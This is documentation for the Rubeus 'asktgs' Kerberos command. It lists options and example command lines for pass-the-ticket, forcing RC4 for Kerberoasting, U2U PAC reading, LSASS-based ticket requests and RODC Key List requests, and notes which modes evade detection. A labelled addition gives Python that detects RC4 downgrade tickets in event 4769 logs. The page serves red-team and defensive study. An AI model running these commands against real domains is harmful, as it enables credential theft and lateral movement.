asktgs

Request service tickets (TGS) using an existing TGT. Builds raw TGS-REQ/TGS-REP traffic.

Usage

Rubeus.exe asktgs </ticket:<ticket> | /ticket:<file>.kirbi> </service:<spn1>,<spn2>,...> [/enctype:DES|RC4|AES128|AES256] [/dc:<dc-ip>] [/outfile:<output>] [/ptt] [/nowrap] [/enterprise] [/opsec] </tgs:<ticket> | /tgs:<file>.kirbi> [/targetdomain:<domain>] [/u2u] [/targetuser:<target-user>] [/servicekey:<hash>] [/asrepkey:<key>] [/proxyurl:https://KDC_PROXY/kdcproxy]

Omit /ticket to request via LSA (uses current session TGT — opsec-friendly, works with Credential Guard):

Rubeus.exe asktgs /service:<spn> [/luid:<luid>] [/nowrap]

Options

  • /ticket:<ticket> — base64 TGT blob or path to .kirbi file
  • /service:<spn> — one or more SPNs, comma-separated
  • /enctype:RC4|AES128|AES256|DES — force specific encryption type
  • /dc:<dc-ip> — domain controller to send request to
  • /ptt — pass-the-ticket, apply to current session
  • /outfile:<output> — save ticket to file
  • /nowrap — don't line-wrap base64 output
  • /opsec — form TGS-REQ in line with genuine requests (AES256 only by default)
  • /enterprise — treat SPN as enterprise principal (user@domain.com)
  • /autoenterprise — auto-retry with enterprise principal on failure
  • /tgs:<ticket> — supply additional TGS for constrained delegation scenarios
  • /targetdomain:<domain> — force target domain for the request
  • /u2u — request user-to-user ticket
  • /targetuser:<target-user> — insert PA-FOR-USER to get PAC for any user (with /u2u)
  • /servicekey:<hash> — service key to decrypt and verify PAC
  • /asrepkey:<key> — AS-REP session key for decrypting U2U credential data
  • /printargs — print golden/silver forge arguments from decrypted PAC
  • /keyList — Kerberos Key List Request (requires RODC partial TGT)
  • /dmsa — request delegated managed service account ticket
  • /luid:<luid> — target logon session (LSA mode, elevated)
  • /proxyurl:<url> — use KDC proxy

Examples

# Request service tickets with a TGT
Rubeus.exe asktgt /user:<username> /rc4:<rc4>
Rubeus.exe asktgs /ticket:<ticket> /service:LDAP/<dc-ip>,cifs/<dc-ip> /ptt

# Force RC4 on AES-enabled account (for Kerberoasting downstream)
Rubeus.exe asktgs /ticket:<ticket> /service:<spn> /enctype:rc4

# User-to-user to read PAC of target user
Rubeus.exe asktgs /u2u /targetuser:<target-user> /ticket:<ticket> /tgs:<ticket>

# LSA mode — no ticket needed, uses current session
Rubeus.exe asktgs /service:LDAP/<dc-ip> /nowrap

# Request local machine TGT via LSASS renewal (admin)
Rubeus.exe asktgs /service:krbtgt/<domain> /luid:0x3e7

# Key List Request via RODC
Rubeus.exe asktgs /keyList /service:KRBTGT/<domain> /ticket:<ticket>

Notes

  • LSA mode (no /ticket) is opsec-friendly — Kerberos traffic originates from LSASS
  • LSA mode required when Credential Guard is active
  • S4U, U2U, keyList, KDC proxy args ignored in LSA mode
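
Detection side of the /enctype:rc4 request shown in the Examples, as an added example that is not part of Rubeus or of the original page: it scans Security event 4769 records for RC4 tickets (Ticket Encryption Type 0x17) issued for service accounts whose msDS-SupportedEncryptionTypes includes AES. The account inventory, account names and event records are constructed for illustration.

```python
from collections import defaultdict

AES_BITS = 0x08 | 0x10   # AES128 | AES256 bits in msDS-SupportedEncryptionTypes
RC4_HMAC = 0x17          # "Ticket Encryption Type" value for RC4-HMAC in event 4769

# Constructed inventory (assumption): service account -> msDS-SupportedEncryptionTypes
SERVICE_ETYPES = {"svc_sql": 0x1C, "svc_web": 0x18, "svc_legacy": 0x04}

# Constructed sample of 4769 EventData fields; not taken from a real log.
EVENTS = [
    {"TargetUserName": "alice@CORP.EXAMPLE", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "bob@CORP.EXAMPLE", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "bob@CORP.EXAMPLE", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "carol@CORP.EXAMPLE", "ServiceName": "svc_legacy",
     "TicketEncryptionType": "0x17", "Status": "0x0"},        # RC4-only account: expected
    {"TargetUserName": "bob@CORP.EXAMPLE", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0xffffffff", "Status": "0x20"},  # failed request: ignored
    {"TargetUserName": "dave@CORP.EXAMPLE", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
]

def rc4_downgrades(events, service_etypes):
    """Map each requesting account to the AES-capable services it got RC4 tickets for."""
    hits = defaultdict(set)
    for ev in events:
        if int(ev["Status"], 16) != 0:
            continue                      # only tickets that were actually issued
        if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        supported = service_etypes.get(ev["ServiceName"])
        if supported is None:
            continue                      # account missing from inventory: no basis to judge
        if supported & AES_BITS:          # account advertises AES, yet the ticket is RC4
            hits[ev["TargetUserName"]].add(ev["ServiceName"])
    return {client: sorted(svcs) for client, svcs in hits.items()}

if __name__ == "__main__":
    for client, services in rc4_downgrades(EVENTS, SERVICE_ETYPES).items():
        print(f"{client}: RC4 ticket for AES-capable {', '.join(services)}")
```

One requester collecting RC4 tickets for several AES-capable services in a short window is the pattern worth alerting on; a single hit may be a legacy client.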